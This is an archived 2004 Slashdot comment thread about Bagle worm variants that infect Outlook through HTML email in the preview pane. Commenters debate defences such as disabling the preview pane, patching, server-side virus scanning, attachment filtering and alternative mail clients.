Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Security Bug Operating Systems Software Windows

Nasty New Virus Variants 1050

Lucidus writes "Numerous journals, such as Mac Daily News and The Motley Fool, are reporting that the latest versions of the Beagle/Bagle virus can infect users' computers whether or not they open an attachment. Apparently, the simple act of selecting the message activates the code. Given that you have to select an E-mail to delete it, how are users supposed to protect themselves from this one?"
This discussion has been archived. No new comments can be posted.

Nasty New Virus Variants

Comments Filter:
  • How about.... (Score:3, Informative)

    by sethadam1 ( 530629 ) * <ascheinberg&gmail,com> on Sunday March 21, 2004 @11:51PM (#8631076) Homepage
    How about...

    a. Turn off preview pane
    b. Use OWA
    c. Stop using Outlook/Outlook Express

    ?!
  • Outlook only (Score:2, Informative)

    by Anonymous Coward on Sunday March 21, 2004 @11:52PM (#8631085)
    Maybe the summary should specify that this is limited to Outlook/Outlook Express. I mean, most people probably know, but it sounds as if ALL email clients are vulnerable, which is hardly the case.
  • by benh999 ( 676109 ) on Sunday March 21, 2004 @11:53PM (#8631098) Homepage
    Disable the preview pane.
  • Re:Two Words: (Score:1, Informative)

    by Anonymous Coward on Sunday March 21, 2004 @11:57PM (#8631131)
    That still selects...
  • Re:Simple... (Score:5, Informative)

    by BigHungryJoe ( 737554 ) on Sunday March 21, 2004 @11:59PM (#8631153) Homepage
    AntiVir [free-av.com] might be a good, free choice.

    I has served me well. Catches a lot of the spyware that my favorite pr0n sites try to push me, too.

  • by numbski ( 515011 ) * <numbski&hksilver,net> on Monday March 22, 2004 @12:03AM (#8631181) Homepage Journal
    Except that it's on by default. :)

    I found that out when I started work at a new company with my PowerBook. Connect to the Exchange via IMAP4 for mail, point the address book at the exchange server via LDAP. iCal wasn't around then, but using that along with groupcal would allow you to do your calendaring, and all without using a single 'authorized' MS client.

    On windows...dunno, perhaps there something similar to the groupcal/ical combo to get your calendaring done without Outlook, but I'm not aware of one offhand.
  • another alternative (Score:5, Informative)

    by Azureflare ( 645778 ) on Monday March 22, 2004 @12:03AM (#8631188)
    is The Bat! [ritlabs.com]. This application is a great replacement for Outlook. In fact I've switched my mum and dad over to it from Outlook, and they love it (though the calender does leave something to be desired). It doesn't automatically view emails in HTML mode, but you can select the HTML if you really want to view it in html. Also, it doesn't automatically load external graphic files in emails. (I don't think it loads ANY external files; not sure).

    It really ensures the user wants to open attachments to emails, and it integrates fine with Norton Antivirus. It even comes with a Bayesian Spam filter (Which really works, once you get a lot of spam emails for it to learn from).

    The Bat is a great program, and it's really improved, especially over the past year.

  • by gvc ( 167165 ) on Monday March 22, 2004 @12:04AM (#8631195)
    The mime-type bug has been known for a long time. Microsoft has corrected it (twice :-)). I know this because my parents' computer was infected between their first and second attempts to fix the problem.

    In a nutshell, Microsoft uses the filename extension, not the mime type, to decide how to open a particular file. On the other hand, Outlook uses the mime type to decide whether or not to automatically launch images, sound files, etc. So all you had to do was to send a mail with an embedded image with a filename ending in .exe, and it was executed.

    It has been more than a year since Microsoft crippled^H^H^H^H^H^H^H^Hfixed IE/OE sufficiently to remove this vulnerability.

    I must concur with previous posters that the best approach is to avoid these software products.
  • What to do (Score:5, Informative)

    by Alien54 ( 180860 ) on Monday March 22, 2004 @12:07AM (#8631220) Journal
    There are a number of decent free and unfree antivirus programs available, as seen in this list [freebyte.com]

    Also nice are programs that let you delete the email at the server before you download, such as mailwasher [mailwasher.net], and with free versions.

    Of course, there are a number of alternate email clients out there that will also help block this beastie

  • by DroopyStonx ( 683090 ) on Monday March 22, 2004 @12:08AM (#8631228)
    I've said it before, and I'll say it again: people need to start being responsible for THEMSELVES. It's not Outlook's fault that the user didn't patch their system.

    I'm sure that if someone wanted to take the time and analyze the source for Thunderbird, they could easily write the same type of worm/virus. However, you won't get the same type of media coverage that the others written for mainstream products will get. And yes, MS does write some exploitable code.

    Most users who aid in the spread of these viruses/worms are ignorant. Time after time, news report after news report, they CONTINUE to fail to keep their systems up to date.

    What's funny is each and every mainstream worm has been written AFTER the patch has been released.. and it's not like the day/week after, it's 5-6 months after. That's sad.

  • by Dominic_Mazzoni ( 125164 ) * on Monday March 22, 2004 @12:15AM (#8631273) Homepage
    the ISPs need to have some server-side virus scan running. we do through our company's email server, and so far, it seems to work like a champ

    This is so true...unlike spam, it's quite possible to detect 100% of known viruses with no false positives. That's because every virus must contain essentially the same payload. Viruses simply can't vary their content as much as spam can, because it has to result in executable code, plus some MIME trick or IE/Outlook exploit, either of which have no legitimate use and could be detected easily.

    I started running ClamAV [clamav.net] on my mail server a couple of weeks ago (after seeing a recommendation for it on Slashdot) and since then I have seen my viruses go down from 500 a day to 1 a week. I manually looked through thousands of the held messages and found no false positives, so now anything that ClamAV scans goes directly to /dev/null.

    I have no idea why all ISPs don't use ClamAV! Obviously they don't need to throw messages away, just in case - advanced users might prefer that messages probably containing viruses just be quarantined instead - but that would eliminate the problem for most people.
  • Re:Simple... (Score:2, Informative)

    by zelphior ( 668354 ) on Monday March 22, 2004 @12:18AM (#8631296) Homepage Journal
    the OP was somewhat overreacting. You still have to open up the email, so if you just delete messages that you think might be viruses then you are fine. I use Outlook express, and if I get a message I'm suspicious of, I right click on it, click Properties, and then view the message source. That gives me all the headers, the original sender, and the message in plaintext. I also turned off HTML, since no one I email sends HTML emails, so anything that comes in with HTML tags is pretty much either a virus or spam.

    It's relatively simple to protect from this type of virus. A simple text only mail reader would go a long way in eliminating viruses. Of course, Microsoft insists on adding more and more "features" to their products. These features are intended to make the computing experience easier on the noob, but end up having the opposite effect. The amount of time it takes to recover from a major virus attack for a newbie is probably longer than it would take to learn a few tips to secure Outlook, or how long it would take to learn to use a different email client. Yet the stupid people still manage to continue to ruin things for the rest of us. Oh well. At least as long as there are people like that, the virus writers will continue to focus on easily fixed security holes in microsoft, rather than creating a Linux or Mac email virus (no idea how this could be done, but I have learned never to underestimate the power of a smart hacker with an ample supply of caffene).
  • by FalconZero ( 607567 ) <FalconZero&Gmail,com> on Monday March 22, 2004 @12:22AM (#8631328)
    My company outsources email virus protection to a dedicated service (Star Internet [star.co.uk]) which checks and forwards.
    Its pretty cheap, and I've not had to worry about any email virii for years.
    I'd (personally) like to see more companies (or even ISPs) going this sort of route as not only does it take the hassle away from sysadmins
    (so you don't have to drive in at X in the morning to apply a patch), but it consequently helps reduce the rate of spread.
  • by BigHungryJoe ( 737554 ) on Monday March 22, 2004 @12:24AM (#8631339) Homepage
    The first time my ISP has a false positive and blocks a legitimate email, I'm going to be pissed.

    This is probably why they don't do it - they can't risk false positives.

    -BHJ
  • by EmbeddedJanitor ( 597831 ) on Monday March 22, 2004 @12:24AM (#8631341)
    I work at a place that has a policy of doing auto updates. It's a bit scary thinking that someone else is deciding what shit to load on your box, but hey you just shut your eyes.

    The problems come about when you have a bunch of software set up together that works. Then MS goes change something in IE and Acroreader stops working forcing you to go upgrade or reinstall acroreader. Things seem OK for a while, then something else stops working...

    This is fire-fighting of an out of control software platform. It is not exactly a great user experience. MS stuff was never really designed to be hooked to the internet.

  • Re:Simple... (Score:2, Informative)

    by sYkSh0n3 ( 722238 ) on Monday March 22, 2004 @12:35AM (#8631410) Journal
    let me get this straight....windows has more ppl looking for holes in it through reverse engineering, etc. then the linux community with it's open look at my code and tell me what you think view on software?

    This is a common defense from windows users. But it is also false. Attacking a windows computer is fairly easy. You have very few variables. M$ windows, M$ outlook, M$ ie, M$ security (ha! i made a funny) creating something to penetrate a windows box isn't exactly brain surgery. Even when a problem is found by people who aren't looking for malicious reasons, the problem has to be submitted to m$, m$ has to review, figure out how to fix it, create a patch, and then release it. Sometimes followed by another patch to patch the patch.

    Now with linux you have OPTIONS. kmail, mozilla, konquerer, etc. etc. and all of this software is released OPEN SOURCE. So you have an infinitely varied setup with an entire community looking at the code. If a problem is found, they can even create their own fixes. Even if a hole in a browser or mail client allows a virus to get into a linux system, the virus has to then find a way to execute itself, and if it wants to do anything major, it also has to find a way to give itself root permissions.

    Writing a linux virus isn't and probably will never be impossible, but it would never be able to spread like blaster or mydoom, or any of the other virus that are reeking havoc on the net everyday.
  • by bcrowell ( 177657 ) on Monday March 22, 2004 @12:40AM (#8631444) Homepage
    1. Switch on automatic updating in which case they don't have to do anything. 2. Go to http://windowsupdate.microsoft.com and download the patches.
    Must ... restrain ... urge ... to bash ... Microsoft ... Must ... restrain ... urge ... Must...

    Sorry, I can't help myself. There are several problems with this. (1) Some people get infected within minutes of putting their machines on the web, which means they haven't had time to fix their Windows machine's insecure out-of-the-box configuration. (My mom, who has a PhD by the way, bought a Windows box, and was infected the next day.) (2) You may not be sure if the updates are going to break something. (3) If you refuse to get on the Windows upgrade treadmill, you may end up running an old, unsupported version of Windows, with no way to upgrade it.

    Note that all of these are problems that come from running a closed-source OS. (1) Open-source OSes aren't driven by marketing concerns, so they're shipped with configurations that are much more secure out of the box. (2) On an open-source OS, people can look at the updates and see if they look like they're of high quality. (3) On an open-source OS, there's no upgrade treadmill.

  • Re:Two Words: (Score:3, Informative)

    by GreyWolf3000 ( 468618 ) on Monday March 22, 2004 @12:40AM (#8631447) Journal
    I think he meant that of those emails blocked, 70% were blocked because they were spam. The other 29.98% were blocked becuase they contained a virus.

    Or the post could be completely mistaken.

  • Re:how to fix (Score:5, Informative)

    by oolon ( 43347 ) on Monday March 22, 2004 @12:42AM (#8631456)
    Easy if you have a cable modem, some of those patches are huge, service packs require 5+ hours to download on a modem.

    James
  • by badriram ( 699489 ) on Monday March 22, 2004 @12:43AM (#8631467)
    Except these worms now are not in attachments, they are part of the email message itself. It uses an activex vulnerability amoung others to attack the computer.

    If people patched their computers, the virus would not have an effect on the computer. Atleast not this one.
  • by LostCluster ( 625375 ) * on Monday March 22, 2004 @12:48AM (#8631493)
    Just what is an executable attachment these days? It used to be possible to say that Word files could never carry a virus, but ever since the Word Macro engine grew up into a full power Visual Basic for Applications that's not so true anymore.

    It used to be possible to say an e-mail with no attachments was safe, but today's virus of the day is proving that wrong... just using an IE bug in an HTML e-mail is enough to cause trouble.

    So, really... nothing's safe. I'm sure somebody will find a buffer exploit for plaintext mail in Outlook someday...
  • by Ironica ( 124657 ) <pixel&boondock,org> on Monday March 22, 2004 @12:50AM (#8631507) Journal
    I have no idea why all ISPs don't use ClamAV! Obviously they don't need to throw messages away, just in case - advanced users might prefer that messages probably containing viruses just be quarantined instead - but that would eliminate the problem for most people.

    My school's mail server, after getting slammed very hard by er... one of them a couple months ago (I can no longer keep up with which virus is which), installed something that I think is called Vscan. What it does is sends you an email which informs you that you were sent a message with a virus attached, and gives you a link with a generated username (usually the "from" email address) and password to view the message... if you really want to.

    I like this system, because it's soooo much easier to filter those messages as Junk than all the random stuff that might be thrown together by a virus ;-) and, if for some reason you get a *real* email that happens to have a virus attached, you can still read it just fine. Remember, back in the old days, when viruses were first learning to use email, and they'd just attach themselves to whatever outgoing messages you'd send? I'll bet there's one or two of those still floating around...
  • Yes and No (Score:5, Informative)

    by macdaddy ( 38372 ) on Monday March 22, 2004 @12:54AM (#8631529) Homepage Journal
    Yes mail admins should implement AV solutions at their borders and within the central mail system itself. All outbound/inbound, inbound/outbound, and inbound/inbound mail should be scanned. However, the providers should not bear the full burden of AV filtering by itself.

    AV solutions can and do break. Our's did at my provider. We still haven't got it back online. Our users have had to endure the full brunt of infected email for far too long.

    No single AV solution can be up-to-date at all times. For starters we can't update our virus definitions within minutes of a newly discovered virus. It just doesn't happen. AV companies couldn't afford the bandwidth without raising our costs beyond what's considered reasonable. Free solutions such as ClamAV [clamav.net] certainly couldn't afford it. Also, not all AV companies discover viruses at the same time. F-Prot might find the latest version of MyDoom before Symantec does. The fact that they found it means it's already in the wild as someone has had to analize it, create a patch for the defs to match this virus, get the patch through Q&A, and get it approved for the next release. There could be numerous hours between the virus getting into the wild, being discovered, being analyzed, and being caught in the latest virus defs.

    Finally no defense of any kind should ever be one layer thick. One layer thick means you have no backup plan. No backup plan means you have no contingency for failures. No contingency for failures means your DRP (disaster recovery plan) has either been written fraudulently or you don't have one. In today's business world that means you'd better start updating your resume. A provider's mail system should not be the only line of defense from email-based viruses. Every single end-user desktop should have an up-to-date AV tool scanning all mail ahead or as a companion to the MUA. This is the *only* acceptable means of defense. You have to have end to end protection.

    Many AV company's licensing scheme take both mail system users and desktops into account. Read the wording carefully because you may very well be able to use the end-user license to cover that user's part of the mail system....

  • Re:Mod Parent Down (Score:5, Informative)

    by Alien54 ( 180860 ) on Monday March 22, 2004 @12:55AM (#8631537) Journal
    So you think you're smart because you know full well virus scanning and patches (release since last year) will solve this problem?? SHUT UP AND STOP TELLING EVERYONE THAT MICROSOFT PRODUCTS WORK, YOU CAPITALIST PIG!

    Well, actually, I do well helping out joe sixpack with exactly this sort of thing. Not everyone is a programmer.

    and you might be interested in these articles

    Eric Raymond's rants: Part One
    http://www.catb.org/~esr/writings/cups-horror.ht ml

    Some follow-ups:
    http://www.catb.org/~esr/writings/luxury-part-de ux.html

    And mind you, I really don't like bill gates, either. So your criticism might be slightly off base. have a beer or take a pill, please

  • by mattgreen ( 701203 ) on Monday March 22, 2004 @12:57AM (#8631548)
    Outlook and Outlook Express give you the option to view all messages as plain text, which strips the HTML out. Anyone know if that renders them safe to the content, or the content is still interpreted and executed?

    A lot of organizations use Outlook in some form or another, so a quick fix like this one could be very beneficial -- if it is a fix.
  • Re:Switch!!! (Score:4, Informative)

    by SanityInAnarchy ( 655584 ) <ninja@slaphack.com> on Monday March 22, 2004 @12:59AM (#8631567) Journal
    Even on Windows, a simple download of Mozilla Thunderbird will solve this, among other problems.

    It's ridiculous that more viruses (or worms) come through email than through any other means. I predict that someday soon, people will stop using Outlook [Express] and start getting their viruses through Internet Explorer, Samba shares, or straight through the wire (smashing the IP stack). Maybe then it really will be important to switch to Linux.

    I agree, people should switch, but if people used Windows with more intelligence... Well, maybe people wouldn't want to switch, which would be a Bad Thing, so maybe I should keep my mouth shut.
  • by berzerke ( 319205 ) on Monday March 22, 2004 @01:00AM (#8631568) Homepage

    ...However, this does mean that similar HTML, from a web browser, might also be dangerous...

    Yes. The flaw isn't in Outlook/OE per se, but in IE, which those two use for rendering html. From the article: "..infects a PC through a known flaw in the Internet Explorer browser..."

  • by Anonymous Coward on Monday March 22, 2004 @01:00AM (#8631569)
    If you select more than one message, the program actually doesn't open them, you can then delete those message in block without ever activating the virus.

    -click on your last legitimate email,
    -bulk select by clicking on the most recent one using the appropriate modifier key (viruses are also on other platforms, except, maybe, osX which has luck, youth and good design on its side)
    -unselect legitimate emails in the selection block using the appropriate modifier key
    -use your menu command to send them to trash (draging with your mouse might slip and select if you are a sloppy clicker like me) or the appropriate folder (junk or anything)

    Of course you have to know first which message contain the virus but if you are like me, you only open email from people you know bearing a subject line that is logical and/or precise. It's actually well regarded by people when you ask them to always write a subject line that contains keywords for you to know that they haven't been generated by a virus sending itself using the incredible Microsoft technologies, anything, usually some passphrase other than generic stuff like "I wanted to get back to you" or stuff like that.

    For the people I don't know of yet but want to reach me legitimately I often go in my junk mail folder (created using simple rules) and look for legitimate subject line and sender address, anyone who has "funny" names and uses generic subject line simply is out of luck with me. Much like we tell kid not to open the door to strangers we shouldn't open anything that comes in the email box, even if the stranger is his uncle, if the kid doesn't know him he is well advised not to open the door, the uncle will understand and the parents will be proud.
  • by Anonymous Coward on Monday March 22, 2004 @01:04AM (#8631582)
    Eliminating all ".zip" attachments, and also ".dll", ".exe", ".scr", ".pif", ".com", and ".bat" seems to do the trick. These are the ones that are either auto-executed by the horrid built-in Windows email clients or are commonly used by people who need an education in how to safely send files.

    The .zip is particularly nasty with Windows XP, which tries very hard to look directly inside them instead of as a bundle that has to be unzipped and examined separately.
  • by hazed ( 699134 ) on Monday March 22, 2004 @01:07AM (#8631595) Homepage
    Speaking as owner of an ISP, if we were to scan email's for virii and a virus got through to a client, we would legally be responsible for the damages caused here in Australia. Thats more liablity than we are prepared to take on and its a stupid law IMHO.
  • by jrockway ( 229604 ) * <jon-nospam@jrock.us> on Monday March 22, 2004 @01:08AM (#8631603) Homepage Journal
    The newer viruses send an encrypted zip file and a password. The user has to save the zip file, unzip the file, type in the password (!!!), and then execute the extracted executable. And there are STILL millions of infected boxen!!!

    Obviously the mail client is not the problem. The user is :(

    (And if you're wondering why the virus is encrypted, it's so it passes through filters. Encrypting with a random password has the nice side effect of randomizing the data. So there are no known strings to filter on. Pretty clever.)
  • by azdio ( 185000 ) <azdio@m e . c om> on Monday March 22, 2004 @01:14AM (#8631631)
    .bat .com .exe .lnk .pif .reg .scr .url .vb .vbs .vbe .zip
    with your favorite milter
  • by Ironica ( 124657 ) <pixel&boondock,org> on Monday March 22, 2004 @01:15AM (#8631641) Journal
    I'm sure that if someone wanted to take the time and analyze the source for Thunderbird, they could easily write the same type of worm/virus.

    I'm not, for several reasons:

    1. Thunderbird has never thought implementing auto-launch of executables embedded in email was a good idea.

    2. If you're using Thunderbird, you're probably using Firebird, and it's not as likely to try to do what the malformed HTML tells it to.

    3. Even if you *do* manage to get Firebird to do it, it's not part of the operating system, and isn't likely to be able to do really nasty stuff to your computer.
  • by gad_zuki! ( 70830 ) on Monday March 22, 2004 @01:19AM (#8631662)
    >c. Stop using Outlook/Outlook Express

    I dont know why slashdot posted this particular fact-free article and with the "what are users supposed to do?" tagline.

    The patch is six months old, people. This isn't some major zero-day exploit that is tearing the internet apart.

    I use firefox/tbird on windows, but still, lets be sensible here. People can use the IE/OE combo without too much fear as long as they keep auto-update running.
  • Simple Solution (Score:2, Informative)

    by WreckingCru ( 764189 ) on Monday March 22, 2004 @01:20AM (#8631668) Homepage
    I use a program called "ePrompter" which is basically a simple text-based mail checking solution for Windows. Helps you read your email quickly and "see" what attachment exists, without providing any sort of access to that attachment. So, I use it to check and read my mail (even reply) when there is no attachment. When there is an attachment (i.e. an email with an attachment that i'm expecting), I use Outlook (or any other email program) to retrieve that file. I highly recommend it. Very simple interface and very intuitive to use. Get it either from www.eprompter.com or download.com from Cnet. Pranav
  • Idiots (Score:2, Informative)

    by taustin ( 171655 ) on Monday March 22, 2004 @01:23AM (#8631684) Homepage Journal
    Given that you have to select an E-mail to delete it, how are users supposed to protect themselves from this one?"

    First, keep your patches current. If that's too complicated, select the message above it, hold down the key, and select the one below it. See how that selects everything in between? Now hit Delete

    This isn't rocket science. Which is good, because people who use Outlook Express aren't rocket scientists.
  • by Raffaello ( 230287 ) on Monday March 22, 2004 @01:26AM (#8631701)
    Their study specifically excluded email client and web browser vulnerabilities, the principal vectors of Windows viruses, worms and trojans. No wonder they found Windows to be "more secure" than Linux - their study left out most of the Windows security problems.

    The firm doing the study are known bozos - they pretty much predicted armageddon on 1/1/2000, and still have much egg on their face from that. They also stretched the truth about their experience and expertise in the computer security field - they were doing something quite different for the first several years of the company's existence, but their press claims security expertise for the whole time.

    An AC citing a "study" known to be flawed, designed to gain free press for the flawed company conducting it should not be trusted.
  • by firewrought ( 36952 ) on Monday March 22, 2004 @01:29AM (#8631716)
    Yah, if windows scripting is on, you'll need to block ".wsh", ".vbs", and ".js" too. Maybe others.
  • Re:Switch!!! (Score:4, Informative)

    by tgibbs ( 83782 ) on Monday March 22, 2004 @01:53AM (#8631805)
    The reason most (or all) AIDS infections happen through unprotected sex is because that's where the virus will do the most damage, since most people have unprotected sex.

    If everyone switches to wearing condoms or practicing abstinence then you'll start to see AIDS mutations that jump through the air or something.


    That is nonsense. A HIV strain that propagates through the air will be strongly favored whether people practice safe sex or not, because people breathe more than they have sex. Taking precautions against venereal spread of HIV will do nothing to increase the mutation rate of the virus.
  • Nothing New (Score:5, Informative)

    by rixstep ( 611236 ) on Monday March 22, 2004 @01:57AM (#8631819) Homepage
    Given that you have to select an E-mail to delete it, how are users supposed to protect themselves from this one?

    This is nothing new. Leigh Stivers of DP Technology, researching in the wake of ILOVEYOU from May 2000, demonstrated in the fall of that same year [com.com] that anything goes with poor products like Microsoft Outlook.

    This revelation, like ILOVEYOU and all that followed, did nothing to move the masses away from their bad habits. AnnaK followed, and after that things only got worse, and still we find people trying to batten down the hatches and still use Outlook and Swiss cheese Microsoft technology.

    So how do you avoid threats like these new Bagles? Easy. You stop using Windows because you're supposed to be smarter than that at this point in time - after getting the shit kicked out of you for four years straight.

    Second, if you're simply too lame to abandon your beloved Windows, then you at least abandon Outlook and all IE-related email technologies such as Eudora. Any email client relying on Internet Explorer is a sitting duck, and you know it.

    I am not telling anyone anything they do not already know; even posing such a question - 'how in heavens will we protect ourselves now?' - is so lame it's beyond description.

    The Bagles are hardly the worst threat right now anyway. Phatbot is out there, harvesting machines like they're going out of style, and coming ever closer to the first million mark. This is outright organised crime. The machines are left as backdoored P2P bots and can harvest bank account details, credit card details, passwords all over the place, and the corrupted machines can be used in further spam attacks - where the unwitting, claiming ignorance and helplessness, go ahead and click on things and use Windows and Outlook and then ask 'how can we protect ourselves?'

    It's not interesting anymore. There's no point in trying to help those who categorically refuse to help themselves and take the necessary steps to be safe. The only concern, voiced for years now, is that these ignoramuses are ruining the Internet for the rest of us - and that is a very real and very justified concern.

  • by LostCluster ( 625375 ) * on Monday March 22, 2004 @02:00AM (#8631828)
    The strength of VB is really in the fact that it really makes using ActiveX to boss around other programs very easy, and also the ability to make system-level DLL calls. VBA adds the extra damage of being able to hide code in a file format that some people might not expect to be executable.

    VBA doesn't actually have anything much missing from the VB6 command set. The only thing it's really missing is the ability to make compiled executables, that VBA programs can only be embeded in certain MS filetypes. It's a much bigger power tool than most people expect...
  • Re:Switch!!! (Score:3, Informative)

    by Babbster ( 107076 ) <aaronbabb&gmail,com> on Monday March 22, 2004 @02:02AM (#8631834) Homepage
    Welcome to jumping the gun. I've read pages of replies and nobody has mentioned an inaccuracy in the Slashdot blurb. It takes slightly more than just "selecting" the message. Specifically, you have to select the message with the preview pane turned on. While it is on by default in Outlook, it's VERY easy to turn it off (which I've done because I don't deal with much e-mail and don't want to deal with switching away from Outlook Express).

    For those who ARE using Outlook Express (you probably don't want to admit it), simply go to View->Layout... and uncheck "show preview pane." Bada bing. Add that to applying the restricted attachment options on the security tab under Tools->Options and you're set. Until they find a way to embed the virus in headers, you'll be safe from e-mail viruses and you can go on using the [admittedly bad] Microsoft e-mail client.

  • .NET (Score:2, Informative)

    by bonch ( 38532 ) on Monday March 22, 2004 @02:02AM (#8631836)
    It's called the .NET runtime, and when Longhorn comes out and EVERYTHING including Windows itself is running on .NET libraries, you're going to have some damn secure systems. What will Slashdotters find to bitch about next? There's always something--it's impossible to satisfy people around here. The friggin' sky is always falling.
  • by shellbeach ( 610559 ) on Monday March 22, 2004 @02:04AM (#8631844)
    You didn't read the article, did you?

    "This new version of Bagle only requires a recipient to open the email or view it within the Outlook preview frame, where some invisible HTML code downloads and infects a PC through a known flaw in the Internet Explorer browser." (my emphasis)

    Nothing to do with attachments ...
  • Four Years Old (Score:5, Informative)

    by rixstep ( 611236 ) on Monday March 22, 2004 @02:07AM (#8631861) Homepage
    New Outlook Hole Found
    http://radsoft.net/news/roundups/luv
    May 8, 2000 0:00 AM UTC
    This is getting ridiculous. An email appears in Outlook's inbox, and even before the user does anything, a message pops up on the screen. 'Had this been a real virus, you would not be happy', it reads. The relieved user clicks 'OK' and another box pops up.

    'Deleting hard drive now... Just kidding!'

    It was written by Leigh Stivers of DP Technology, who is trying to draw attention to a hole in Outlook that is far more dangerous than the ones ILOVEYOU found - this hole allows any email to be loaded invisibly with a destructive program that could go as far as deleting an entire hard drive.

    Unlike viruses like ILOVEYOU or Melissa, these programs have no attachment and give no indication that they are anything other than ordinary email.

    And with Outlook's factory defaults, this program - which might have been set to wipe your entire hard drive clean - can start running without you having to click a thing, before Outlook even tells you mail is there.

    'The script can do almost anything', said Stivers. ''We were amazed to see how open everything was in house here, and we take security pretty seriously.'

    You shouldn't have been amazed, Mr. Stivers. But thanks for the tip. We shall now visit the C|net link and read the article and within 30 minutes be running a better email client - for this writing on the wall is surely enough for even the lamest Outlook user?

    http://news.com.com/2100-1001-240189.html

  • Re:Switch!!! (Score:2, Informative)

    by gujo-odori ( 473191 ) on Monday March 22, 2004 @02:09AM (#8631866)
    Insightful?! You, moderators! Yeah, you! Put down those crack pipes and come out with your hands on top of your head!

    The fact is, the kinds of viruses that routinely affect Outlook and Outlook Express are simply impossible on Linux or any other flavor of Unix. The architecture doesn't work that way. There have been viruses and worms written for *nix, and with the exception of the Morris worm, which actually exploited a feature of Sendmail rather than of Unix and was a cross-platform worm thereby, none of them have been particularly widespread.

    It has already been explained by someone else, but in Linux - no matter what mail client you use - there is simply no concept of an excutable attachment. Binary attachments may be viewable, but they cannot be executed. So until someone comes up with a way to embed something in an attachment which can cause the viewer to do something bad, such as take the attachment and execute it as its own code, Linux and all other *nix platforms are pretty safe from email viruses. Moreover, not only is such a thing very hard to do (if it's even possible), it's further limited by the fact that you just don't know what somebody is using as a viewer for a given file type. There are so many choices. There are dozens of things that could be my .jpg viewer, for example. Maybe you found a way to make Kuickshow take code embedded in a .jpg and execute it, but if I'm not using Kuickshow, you're SOL.

    A worm that does not depend on email has a little better chance on *nix, such as the Lion worm (IIRC) that could infect certain versions of lpd a few years ago. Still, that one was never really widespread either, because:

    A) Not all machines are running any kind of lpd;
    B) If they are, it may be firewalled off and/or not listening on an external interface and/or not accepting connections from non-local IPs;
    C) It might not be an affected version anyway;
    D) It might be CUPS or lprng, and those wouldn't be affected at all, unless you took all three of them into account when writing the worm (the lion worm didn't). Even then, you'd have to hit the right version on the right platform for each variant.

    A worm or virus that tried to exploit features of an MTA or database or something within X would also face a tough time because they might not (read "probably won't") work on all distros, glibc versions, KDE versions, Gnome versions, Fluxbox versions, IceWM versions, WindowMaker verions, etc. If it depends on an MTA or database to spread, then you have to account for Sendmail (lot of versions), Postfix, qmail, Exim (v. 3.x and 4.x), some proprietary MTAs, and who knows what else. If it's a database, could be Oracle, MySQL, Postgresql, or who knows what else. And of course it has to be unfirewalled. Most people running an SQL server on *nix are also running a firewall. Maybe multiple layers of firewalling, if they're properly paranoid.

    These are issues faced by anyone who wants to write a virus or worm for Linux or Unix.

    The fact is, writing worms and viruses for Linux, *BSD, or a proprietary UNIX platform is a lot harder than writing them for Windows, and they spread a lot more slowly and don't get nearly as far. Yes, as Linux continues to grow in popularity you will see more attempts at viruses and worms for Linux. Most of them will be abject failures, and even the ones that aren't will never have the impact that Viruses and worms have had on Windows. Not only for the reasons outline above, but for one more big one, which is a product of the reasons above: SPEED. There are simply too many different distros on different hardware platforms, with different configurations, and different versions of key items on which a worm will depend, for it to be able to spread quickly.

    That is why, even if Linux should someday utterly dislodge Windows from the desktop and command a 90% market share, with the rest mostly held by Mac, it will NEVER have the kind of virus and worm problems Windows has. On Windows, the problems are designed in. On *nix, they are designed *out*.
  • Use MailWasher (Score:2, Informative)

    by Gary Destruction ( 683101 ) * on Monday March 22, 2004 @02:10AM (#8631869) Journal
    Mail Washer [firetrust.com] lets you preview your mail BEFORE you download it. And it automatically ignores images and shows paths of links. It also has heuristics to detect viruses.
  • Re:Complete lie (Score:5, Informative)

    by WindBourne ( 631190 ) on Monday March 22, 2004 @02:16AM (#8631896) Journal
    I guess you missed the study Slashdot itself posted that showed Linux was the most-breached OS. Incidentally, BSD was the least-breached.

    I saw the study. It was done the British group Mi2, who is about as useful as IDC or Gartner, with their own vested interest. In almost every situation, the Linux openings were simple PHP's being hit on systems with multi domains rather than the systems being owned. Too be honest, I would love to see a company/group without a vested interest do a real study and report the numbers.

    BTW, even though your BSD statement was a simple red herring, I suspect that it has merit.
  • by dtdns ( 559328 ) on Monday March 22, 2004 @02:20AM (#8631915) Homepage
    From my experience, you're in the minority. We're not an ISP, but we do host e-mail for a number of companies. We recently implemented Vircom's modusMail [modusmail.com] which is expensive, but the virus and spam filtering it provides is simply amazing. It catches about 99% of the incoming spam and all of the current viruses. It auto updates both filters pretty much daily, sometimes more.

    The spam filter is very aggressive, so when we first implemented it there were some false positives. It throws everything it filters into a quarantine and generates daily quarantine reports to all of the users along with a "release" link. If there's a FP in there, the user can release it right then and there. It even offers to whitelist the sender to prevent more FP's in the future.

    I know there have been some FP's since we track the release clicks, but we've had no complaints and nothing but praise since we put it in.

    The best part is that our e-mail admin time has been reduced only to adding new accounts :).

  • by BrianGa ( 536442 ) on Monday March 22, 2004 @02:25AM (#8631934)
    "Apparently, the simple act of selecting the message activates the code"

    It's not a matter of opening.
    People have to select the message to delete it in Outlook, which presents a problem.
  • by MarsDefenseMinister ( 738128 ) <dallapieta80@gmail.com> on Monday March 22, 2004 @02:37AM (#8631984) Homepage Journal
    Writing a program to detect if another program is a virus is pretty much the same problem as writin a program to detect if another program halts. I'd say that we're not ever going to see a perfect universal virus filter.
  • by runderwo ( 609077 ) <runderwo@mail.wi ... rg minus painter> on Monday March 22, 2004 @02:37AM (#8631986)
    I manually looked through thousands of the held messages and found no false positives, so now anything that ClamAV scans goes directly to /dev/null.
    Be careful. You might lose some messages you actually want, if anything ClamAV scans goes directly to /dev/null.

    Joking aside, be careful that you check the exact exit code that you need to determine whether ClamAV found a virus or not. I was using a script called clamfilter.pl that someone else wrote. Since I was in a hurry, I went ahead and stuck it in my procmailrc without checking into it much. It seemed to work for quite a while. When one of the MS virus storms hit, I started sending all the viruses to /dev/null like you are. This turned out to be a mistake.

    At some later point, we had a hard drive disaster that left most of /usr unreadable. However, the mail server was still running, and still using clamav to filter mail. Due to one of clamav's files becoming unreadable, clamav started exiting with a nonzero exit code, but not because it was finding a virus in the mail. Hence ALL mail went to /dev/null for a few days while the system was being rebuilt, and we didn't discover it until afterwards. I filed a bug with the clamfilter forum, but up till now the author hasn't fixed his (IMO dangerous) code that he is offering for general use.

    The moral of the story is, if you are sending mail to /dev/null in ANY case, be damn sure that you are properly checking clamscan's exit code.

